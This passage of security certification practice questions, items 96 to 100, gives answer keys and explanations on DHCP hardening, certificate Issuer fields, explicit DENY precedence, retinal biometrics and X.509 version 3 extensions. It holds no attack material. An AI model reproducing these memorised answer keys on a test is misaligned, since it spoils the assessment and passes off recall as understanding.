having sent or received the data in question. Both answers B and C are incorrect.
And repudiation is defined as the act of refusal; therefore, answer D is
incorrect.

96
Q
Which of the following are steps that can be taken to harden DHCP services?

❍ A. Anonymous access to share files of questionable or undesirable content
should be limited.
❍ B. Regular review of networks for unauthorized or rogue servers.
❍ C. Technologies that allow dynamic updates must also include access
control and authentication.
❍ D. Unauthorized zone transfers should also be restricted.

A

Answer B is correct. Regular review of networks for unauthorized or rogue
servers is a practice used to harden DHCP services. Answer A is incorrect
because anonymous access to share files of questionable or undesirable content
should be limited for proper FTP server security. Answers C and D are
incorrect because they are associated with hardening DNS servers.

97
Q
Which of the fields included within a digital certificate identifies the directory name of the entity signing the certificate?

❍ A. Signature Algorithm Identifier
❍ B. Issuer
❍ C. Subject Name
❍ D. Subject Public Key Information

A

Answer B is correct. The Issuer field identifies the name of the entity signing
the certificate, which is usually a certificate authority. The Signature
Algorithm Identifier identifies the cryptographic algorithm used by the CA to
sign the certificate; therefore, answer A is incorrect. The Subject Name is the
name of the end entity identified in the public key associated with the certificate;
therefore, answer C is incorrect. The Subject Public Key Information
field includes the public key of the entity named in the certificate, including a
cryptographic algorithm identifier; therefore, answer D is incorrect.

98
Q
Which of the following rights assignments overrides all others in a DAC or RBAC environment?

❍ A. Implicit DENY
❍ B. Implicit ALLOW
❍ C. Explicit ALLOW
❍ D. Explicit DENY

A

Answer D is correct. An explicit DENY overrides all other access grants in a
discretionary access control environment. Explicit rights assignments function
in combination with inherited implicit rights in all other cases, making
answers A, B, and C incorrect.

99
Q
Which type of biometric authentication involves identification of the unique patterns of blood vessels at the back of the eye?

❍ A. Facial recognition
❍ B. Iris
❍ C. Retina
❍ D. Signature

A

Answer C is correct. Retinal biometric systems identify unique patterns of
blood vessels in the back of the eye. Facial recognition systems identify fixed
spacing of key features of the face such as bones, eyes, and chin shape, making
answer A incorrect. Answer B is incorrect because iris scanning involves identification
of unique patterns in the outer colored part of the eye. Answer D is incorrect because signature analysis is a form of biometric authentication
recording the speed, shape, and unique kinematics of a personal written
signature.

100
Q
Which version of X.509 supports an optional Extension field?

❍ A. Version 1
❍ B. Version 2
❍ C. Version 3
❍ D. Answers B and C

A

Answer C is correct. Version 3 of X.509, which was introduced in 1996, supports
an optional Extension field used to provide for more informational fields.
Version 1 is the most generic and did not yet incorporate this feature; therefore,
answer A is incorrect. Version 2 did introduce the idea of unique identifiers,
but not the optional Extension field; therefore, answers B and D are incorrect.